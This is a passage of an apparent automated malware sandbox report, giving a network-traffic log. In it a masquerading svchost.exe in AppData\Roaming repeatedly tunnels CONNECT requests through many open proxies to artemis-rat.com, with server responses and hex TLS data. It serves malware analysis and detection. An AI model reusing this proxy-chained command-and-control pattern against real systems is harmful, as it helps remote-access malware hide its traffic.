                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2391192.168.2.55758489.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.059559107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.833453894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2392192.168.2.557660106.14.255.1248043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.073225975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.405277014 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2393192.168.2.55768958.234.116.197819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.073348999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2394192.168.2.5576598.222.164.2051567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.073610067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2395192.168.2.557866104.25.234.818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.075963974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.230529070 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2396192.168.2.55764543.128.107.251888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.076349020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2397192.168.2.557872104.20.103.688043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.077914953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.232604980 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2398192.168.2.557732157.159.10.868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.089641094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.742352009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.677279949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.535742044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.117609024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2399192.168.2.557734119.196.168.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.092329979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2400192.168.2.557870204.236.176.618043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.095448017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.274084091 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:30.325967073 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a4 79 bb 6e bd 22 0d f0 16 11 f6 8c 4d de fc 81 51 53 8c 00 6b c9 59 c4 c6 b2 8b f3 71 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRyn"MQSkYq*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:30.499634027 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 8e f7 57 2d ad 27 0f 3a 21 29 c8 cd 29 13 d8 23 b8 e5 fb 37 31 b8 35 df 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9W-':!))#715DOWNGRD0000*H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0*H0";dJJH
                                                                                    Mar 9, 2024 13:14:30.525509119 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ce 2b f8 32 00 57 32 3e 38 6c a8 78 d4 07 a8 b5 29 26 4a 31 9f 90 db d8 7f a5 56 bc 88 87 da 3c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 09 f0 96 d1 a6 3c 37 1f 90 89 c1 82 fa e2 4d cc 91 55 76 fc cc
                                                                                    Data Ascii: %! +2W2>8lx)&J1V<(<7MUv-^l{:b
                                                                                    Mar 9, 2024 13:14:30.696814060 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 ce 5a 62 19 6c b8 cf 15 2b 1d ae 39 1c 2a f7 4d b9 cb be b4 40 33 45 53 09 6b 54 f4 46 54 1d 66 a4 f9 27 07 4d fa 57 0e
                                                                                    Data Ascii: (Zbl+9*M@3ESkTFTf'MW


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2401192.168.2.556898181.129.62.24737743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.102824926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2402192.168.2.557871162.214.121.1734482643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.106024027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.623852968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.270908117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.546401978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.880494118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.254093885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2403192.168.2.55767249.4.48.128888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.106997013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.464099884 CET184INHTTP/1.1 500 Internal Server Error
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 494
                                                                                    Connection: close
                                                                                    ETag: "658e91eb-1ee"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2404192.168.2.555528174.77.111.196414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.108241081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2405192.168.2.557709148.72.215.794720243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.111960888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.880198956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880990982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974312067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.974242926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2406192.168.2.5577593.37.125.76312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.121753931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.444415092 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2407192.168.2.55772731.28.4.1928043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.124950886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.467092991 CET488INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 306
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 63 2e 70 6c 6f 6d 62 77 61 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 1c.plombway.ru Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2408192.168.2.55768849.228.131.169500043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.126274109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2409192.168.2.55772595.0.168.62198143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.141503096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.880237103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.068100929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.177702904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.504307985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2410192.168.2.5576295.32.88.130808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.141504049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.568950891 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2411192.168.2.55673251.89.173.403172443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.143019915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2412192.168.2.55771947.100.236.23808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.144161940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.512271881 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
